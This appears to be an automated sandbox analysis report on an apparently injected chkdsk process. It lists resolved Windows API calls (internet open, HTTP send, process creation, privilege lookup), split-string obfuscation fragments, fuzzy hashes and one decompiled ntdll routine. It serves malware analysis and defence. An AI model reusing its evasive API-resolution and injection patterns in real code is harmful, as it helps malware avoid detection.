Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: f213af7ae318c5dbdd983d388aa7fc33bc70a64f7f57c657f26ef412a9e514a6
Instruction ID: cbbd6eadaa96400dd89fcfbc9dd55bc9ba6af58e9a0107e908f130b6f164647d
Opcode Fuzzy Hash: f213af7ae318c5dbdd983d388aa7fc33bc70a64f7f57c657f26ef412a9e514a6
Instruction Fuzzy Hash: 4FF019B2911218AF8B14DF98DC419EBB7B8EF48310B048589FE18A7245D635AE508BE1

Uniqueness

Uniqueness Score: -1.00%

Function 0071A969 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 37networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 0071A9C7

Strings

Open, xrefs: 0071A998
rnet, xrefs: 0071A991
Inte, xrefs: 0071A98A
rnetOpenA, xrefs: 0071A9C1, 0071A9C6
A, xrefs: 0071A99F
InternetOpenA, xrefs: 0071A9BD, 0071A9C5

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: a83a088ac29f4d0b229d22847f599dd92ab4d41fadc9a28375c61cc8593bca24
Instruction ID: 1603bffbcb57e5a88c803899aa0b2e8238c73b4091b8f5d1a3616aec205f1ad3
Opcode Fuzzy Hash: a83a088ac29f4d0b229d22847f599dd92ab4d41fadc9a28375c61cc8593bca24
Instruction Fuzzy Hash: 8EF019B2901118AF8B14DF88D845DEB77B8EF48300B048549BE58A7345D234AA508BE1

Uniqueness

Uniqueness Score: -1.00%

Function 0071AB4A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 22networkCOMMON

Download Yara Rule

APIs

HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 0071AB3C

Strings

HttpSendRequestA, xrefs: 0071AB2E, 0071AB39
RequestA, xrefs: 0071AB36, 0071AB3B
SendRequestA, xrefs: 0071AB32, 0071AB3A

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: HttpRequestSend
String ID: HttpSendRequestA$RequestA$SendRequestA
API String ID: 360639707-2125227114
Opcode ID: d465d144c8eb7ee4e51f95549ddb8edfdd0ddcee32702c2021a97fe8f640918a
Instruction ID: b83b09c9b1947d8d4003afc7c946b808bd9e28afaf6484d758bf30de2eddb919
Opcode Fuzzy Hash: d465d144c8eb7ee4e51f95549ddb8edfdd0ddcee32702c2021a97fe8f640918a
Instruction Fuzzy Hash: BBE04FB1A0915CABCB24DF4CD850ABB7369DB48310F044549FD1893240D6359D2087E1

Uniqueness

Uniqueness Score: -1.00%

Function 00719070 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 00719118

Strings

net.dll, xrefs: 007190E1, 00719167, 0071913F, 0071914B, 00719173
wininet.dll, xrefs: 007190CE, 007190D7

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: e578097e0ed88a25362c476b2730fb448242e0785235446baa8a71518d4502eb
Instruction ID: ea6c240f530d3a682752f664606a5286788fc9e947a8c1b1b8ba00485f6b1480
Opcode Fuzzy Hash: e578097e0ed88a25362c476b2730fb448242e0785235446baa8a71518d4502eb
Instruction Fuzzy Hash: D031A6B2900305FBC714DF68CC89FA7B7B8BB48700F10851DF62A5B285D634B591CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00719066 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 82sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 00719118

Strings

net.dll, xrefs: 007190E1, 0071913F, 0071914B
wininet.dll, xrefs: 007190CE, 007190D7

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 702934070d0b0c56654f08a5f2f210e84ec29466dcbc5996e7af4d2021e4ac4e
Instruction ID: 3a77f7dc61579f3bd013311e1158893ee5c350b75b39816181af0d673f6477bf
Opcode Fuzzy Hash: 702934070d0b0c56654f08a5f2f210e84ec29466dcbc5996e7af4d2021e4ac4e
Instruction Fuzzy Hash: 3A21A2B1A00305FBC714DF68C889FA7BBB8FB48700F10842DF6295B285D778A595DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0071A660 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00703AF8), ref: 0071A68D

Strings

.z`, xrefs: 0071A67C, 0071A688

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: a9052e03a2bc0a28f86cccf75a30ceff1e52a83307db00c41f6f43c5aa847ef6
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: FFE01AB1200204ABDB14DF59CC49EA777ACAF88750F014554B91C57241C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0071A620 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(&Eq,?,00714C9F,00714C9F,?,00714526,?,?,?,?,?,00000000,00000000,?), ref: 0071A64D

Strings

&Eq, xrefs: 0071A642, 0071A64C

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &Eq
API String ID: 1279760036-1770854826
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 845761dc96ecdffb627a1cbefc9942fc7ce8c59dee67fa220cbe9cfb05bca49c
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 95E012B1200208ABDB14EF99CC45EA777ACAF88664F118558BA1C5B282C630F9118AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0071A655 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(&Eq,?,00714C9F,00714C9F,?,00714526,?,?,?,?,?,00000000,00000000,?), ref: 0071A64D

Strings

&Eq, xrefs: 0071A642, 0071A64C

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &Eq
API String ID: 1279760036-1770854826
Opcode ID: 9561686de1316977a3ce7faae3b09351b89e4e7b19a4149025285c9b754f8550
Instruction ID: 349d4ef2642d2e889d431bc6e85f6e7c7783de06dfc8d4d0cfdbb9a9f45cd318
Opcode Fuzzy Hash: 9561686de1316977a3ce7faae3b09351b89e4e7b19a4149025285c9b754f8550
Instruction Fuzzy Hash: 31E086B910A3C0AFD711EF34AC808D7B7A5AE85318725454EF89883687C635D51A97B1

Uniqueness

Uniqueness Score: -1.00%

Function 00712750 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000,00000000,00703A1A,00000000), ref: 00712767

Strings

@J7<, xrefs: 0071277B

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: 8296373e09b2688dba4aae03a4466b30fdd64ecc5eca1f4d810b493abce50cc4
Instruction ID: 3ce07e950e255678056e434f5cfd23956bab8e9136297b4261fa0023a7da1e88
Opcode Fuzzy Hash: 8296373e09b2688dba4aae03a4466b30fdd64ecc5eca1f4d810b493abce50cc4
Instruction Fuzzy Hash: 9F312FB6A0020A9FDB00DFD8D8809EFB7B9FF88304B108559E505AB255D775EE45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00708308 Relevance: 3.1, APIs: 2, Instructions: 58threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0070836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0070838B

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 2d1cd8006e8e55cf453aada8d4d14765724e663adb783817e203559ffb0fe9bb
Instruction ID: 66c0bab2430940df3595e00bc8f77a1e122efc795de071560ded076eee0cfacd
Opcode Fuzzy Hash: 2d1cd8006e8e55cf453aada8d4d14765724e663adb783817e203559ffb0fe9bb
Instruction Fuzzy Hash: ED01B931A80328FBE715A6949C47FFE776C6B40B50F040219FF04BA1C2D7E8690546E6

Uniqueness

Uniqueness Score: -1.00%

Function 00708310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0070836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0070838B

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 3cdca4b5367aec0e6e3e784928614098f21bfa070d16ceb3206da37e3d413c21
Instruction ID: 717da3058a7ace2a50a8f53c5e4e3176b2b3e047e38a12c01cf951191faa9b71
Opcode Fuzzy Hash: 3cdca4b5367aec0e6e3e784928614098f21bfa070d16ceb3206da37e3d413c21
Instruction Fuzzy Hash: 1E01A771A80328F7E721A6989C47FFE776C6B40F50F050214FF04BA1C2E6D8690546F6

Uniqueness

Uniqueness Score: -1.00%

Function 0071A765 Relevance: 1.6, APIs: 1, Instructions: 62processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0071A724

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 88a9a11d9bc1c3abfd4b01f9b654d6556a85f97f356b46c183008b25253b6380
Instruction ID: 824d33de075f0620a4b6f75f8f9aa5a7bc1f57172e649ead8164930fc15b7055
Opcode Fuzzy Hash: 88a9a11d9bc1c3abfd4b01f9b654d6556a85f97f356b46c183008b25253b6380
Instruction Fuzzy Hash: 9B11D0B6210109AFCB04DF9DEC81DEB77ADAF8C718F118248FA1D97241D630E961CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0070ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0070AD52

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: 9f552d02782959fec69bbfa71e177ba68ccf7cbffe9dc12ac20de77961cd3840
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: FD010CB5E4020DFBDB10EAE4DC46FDDB3B89B58308F1082A5A91897281F635EA548B91

Uniqueness

Uniqueness Score: -1.00%

Function 0071A6D0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0071A724

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 45826eba0a7e685542b162c805669b1fe0c42c2bea01aaf0d786fe319502fd91
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: D801AFB2210108BFCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 007191A0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000,?,?,0070F040,?,?,00000000), ref: 007191DC

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 6688f86f132fa37c9027dc8d1c8f8cbb4e701adb4342013b9a08c6fd41ac5782
Instruction ID: df336c6c6505178503e73845eba01f92b194cd101776a03716df1925084b7656
Opcode Fuzzy Hash: 6688f86f132fa37c9027dc8d1c8f8cbb4e701adb4342013b9a08c6fd41ac5782
Instruction Fuzzy Hash: 55E06D773912143AE32065ADAC02FE7B79C9B81B30F140026FB0DEB2C1D599F84142A4

Uniqueness

Uniqueness Score: -1.00%

Function 00719193 Relevance: 1.5, APIs: 1, Instructions: 32threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000,?,?,0070F040,?,?,00000000), ref: 007191DC

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 09284c93ec22430693913e4e54fcfab77b7646447d3692d8f73a6cbce32f8d18
Instruction ID: b4bd7df611a62bbd742b717f2dfb24821d94fafc55611a6aa5269b8591fab0bc
Opcode Fuzzy Hash: 09284c93ec22430693913e4e54fcfab77b7646447d3692d8f73a6cbce32f8d18
Instruction Fuzzy Hash: C7F02B76380300B7E3306A5C8C02FE77358EF80B20F14042DF749BB2C1D5A9B54246A4

Uniqueness

Uniqueness Score: -1.00%

Function 0071A7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0070F1C2,0070F1C2,?,00000000,?,?), ref: 0071A7F0

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 68d39947367ed0bf660e3d2ee70049de8ede80290a6cb072ce4e11c622160f5d
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 68E01AB1200208ABDB10DF49CC85EE737ADAF88650F018154BA0C57241C934E9118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0070F6C0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008003,?,00708D14,?), ref: 0070F6EB

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction ID: ece7fb624fc359b72828c88c298e51802aa4a0785d6a282287dd03b87fa74b36
Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction Fuzzy Hash: D0D0A9B27903087BEB20FAA89C07F6633CCAB44B04F490074FA48EB3C3E969E4008165

Uniqueness

Uniqueness Score: -1.00%

Function 05022B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05022B44

Memory Dump Source

Source File: 00000020.00000002.5733014309.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: true

Associated: 00000020.00000002.5736621977.00000000050D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4fb0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5aab3d6ca6c1e6ec18de61551039c63d74f616c5c388cad3a6fe2ded6fabe974
Instruction ID: 47752c92e205a1f5717f3ddd7ddf1731c64ceb201a956c89c40b79847ea09b97
Opcode Fuzzy Hash: 5aab3d6ca6c1e6ec18de61551039c63d74f616c5c388cad3a6fe2ded6fabe974
Instruction Fuzzy Hash: 24B09B719024D5C5DB51D760570CB1F79557BD1701F55C495E1464641E4738C091F175

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0071730D Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1834bb20c259ab844c2d246dcb82b50895d03f575589d6b2734cb617e3b31cbe
Instruction ID: d607b2794d0a8f38c13e858d15bdc0a415f7ee3eab2bed500dc719f5244e55ff
Opcode Fuzzy Hash: 1834bb20c259ab844c2d246dcb82b50895d03f575589d6b2734cb617e3b31cbe
Instruction Fuzzy Hash: 78C0126AA0020859C5185D787D51AFCEB6097C6AB7F04736AE944B30516506D816555C

Uniqueness

Uniqueness Score: -1.00%

Function 00707B1C Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93e9b370c502b982bd05f425f92b99788247e1946f8b58d31d2bd90078fb0fae
Instruction ID: 1b0fbfbc16d48c616459062a33e62f7a633ba1e82d4cb6c68920cd3cf91008b1
Opcode Fuzzy Hash: 93e9b370c502b982bd05f425f92b99788247e1946f8b58d31d2bd90078fb0fae
Instruction Fuzzy Hash: B6C08C72A0A70182C1145F0CB8C01B0F366EB5323AF0027E3D9086B201CAA3E8A20288

Uniqueness

Uniqueness Score: -1.00%

Function 05017550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E05017550(void* __ecx) {
				signed int _v8;
				char _v548;
				unsigned int _v552;
				unsigned int _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t49;
				signed char _t53;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t65;
				unsigned int _t66;
				void* _t68;
				unsigned int _t73;
				unsigned int _t77;
				unsigned int _t85;
				char* _t98;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0x50db370 ^ _t107;
				_v8 =  *0x50db370 ^ _t107;
				_t105 = __ecx;
				if( *0x50d6664 == 0) {
					L5:
					return E05024B50(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E04FEE580(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v556 = _t85;
					_t49 = E05017738(_t105);
					__eflags = _t49;
					if(_t49 != 0) {
						L15:
						_t103 = 2;
						_v556 = _t103;
						L10:
						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E0501763B(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
							__eflags = _t45;
						}
						__eflags = _t45;
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v556 = _t102;
						}
						__eflags = _t102;
						if(_t102 != 0) {
							L33:
							_push(4);
							_push( &_v556);
							_push(0x22);
							_push(0xffffffff);
							_t45 = E05022B70();
						}
						goto L4;
					}
					_v552 = _t85;
					_t102 =  &_v552;
					_t55 = E050176ED(_t105 + 0x2c, _t102);
					__eflags = _t55;
					if(_t55 >= 0) {
						__eflags = _v552 - _t85;
						if(_v552 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						E0506EF10(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v552);
						_v560 = 0x214;
						E05028F40( &_v548, 0, 0x214);
						_t106 =  *0x50d6664;
						_t110 = _t108 + 0x20;
						 *0x50d91e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						_t65 =  *((intOrPtr*)( *0x50d6664))();
						__eflags = _t65;
						if(_t65 == 0) {
							goto L8;
						}
						_t66 = _v560;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L8;
						}
						__eflags = _t66 - 0x214;
						if(_t66 >= 0x214) {
							goto L8;
						}
						_t68 = (_t66 >> 1) * 2 - 2;
						__eflags = _t68 - 0x214;
						if(_t68 >= 0x214) {
							E05024C68();
							goto L33;
						}
						_push(_t85);
						 *((short*)(_t107 + _t68 - 0x220)) = 0;
						E0506EF10(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
						_t111 = _t110 + 0x14;
						_t73 = E0502A9C0( &_v548, L"Execute=1");
						_push(_t85);
						__eflags = _t73;
						if(_t73 == 0) {
							E0506EF10(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
							_t106 =  &_v548;
							_t98 =  &_v548;
							_t112 = _t111 + 0x14;
							_t77 = _v560 + _t98;
							_v552 = _t77;
							__eflags = _t98 - _t77;
							if(_t98 >= _t77) {
								goto L8;
							} else {
								goto L27;
							}
							do {
								L27:
								_t85 = E0502A690(_t106, 0x20);
								__eflags = _t85;
								if(__eflags != 0) {
									__eflags = 0;
									 *_t85 = 0;
								}
								E0506EF10(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
								_t112 = _t112 + 0x10;
								E0505CC1E(_t105, _t106, __eflags);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L8;
								}
								_t41 = _t85 + 2; // 0x2
								_t106 = _t41;
								__eflags = _t106 - _v552;
							} while (_t106 < _v552);
							goto L8;
						}
						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
						_push(3);
						_push(0x55);
						E0506EF10();
						goto L15;
					}
					L8:
					_t56 = E05017648(_t105);
					__eflags = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					_t103 = _v556;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}

0x05017560
0x05017562
0x0501756f
0x05017571
0x050175ab
0x050175b9
0x050175b9
0x05017579
0x05017583
0x0501758f
0x05054443
0x05017595
0x0501759e
0x0501759e
0x050175a2
0x050175bc
0x050175c2
0x050175c7
0x050175c9
0x05017621
0x05017623
0x05017624
0x050175f8
0x050175ff
0x05017601
0x0501762c
0x05017603
0x05017609
0x05017610
0x05017612
0x05017612
0x05017612
0x05017614
0x05017616
0x05017630
0x05017633
0x05017633
0x05017618
0x0501761a
0x050545c9
0x050545c9
0x050545d1
0x050545d2
0x050545d4
0x050545d6
0x050545d6
0x00000000
0x0501761a
0x050175ce
0x050175d4
0x050175da
0x050175df
0x050175e1
0x0505444a
0x05054450
0x00000000
0x00000000
0x05054456
0x05054469
0x05054476
0x05054486
0x0505448b
0x05054497
0x050544b9
0x050544bf
0x050544c1
0x050544c3
0x00000000
0x00000000
0x050544c9
0x050544cf
0x050544d1
0x00000000
0x00000000
0x050544dc
0x050544de
0x00000000
0x00000000
0x050544e6
0x050544ed
0x050544ef
0x050545c4
0x00000000
0x050545c4
0x050544f7
0x050544f8
0x05054510
0x05054515
0x05054524
0x0505452b
0x0505452c
0x0505452e
0x05054556
0x05054561
0x05054567
0x05054569
0x0505456c
0x0505456e
0x05054574
0x05054576
0x00000000
0x00000000
0x00000000
0x00000000
0x0505457c
0x0505457c
0x05054584
0x05054588
0x0505458a
0x0505458c
0x0505458e
0x0505458e
0x0505459b
0x050545a0
0x050545a7
0x050545ac
0x050545ae
0x00000000
0x00000000
0x050545b4
0x050545b4
0x050545b7
0x050545b7
0x00000000
0x050545bf
0x05054530
0x05054535
0x05054537
0x05054539
0x00000000
0x0505453e
0x050175e7
0x050175e9
0x050175ee
0x050175f0
0x00000000
0x00000000
0x050175f2
0x00000000
0x050175a4
0x050175a4
0x050175a4
0x00000000
0x050175a4

Strings

CLIENT(ntdll): Processing section info %ws..., xrefs: 05054592
Execute=1, xrefs: 0505451E
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 05054507
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05054530
ExecuteOptions, xrefs: 050544AB
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05054460
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0505454D

Memory Dump Source

Source File: 00000020.00000002.5733014309.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: true

Associated: 00000020.00000002.5736621977.00000000050D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4fb0000_chkdsk.jbxd

Similarity

API ID:
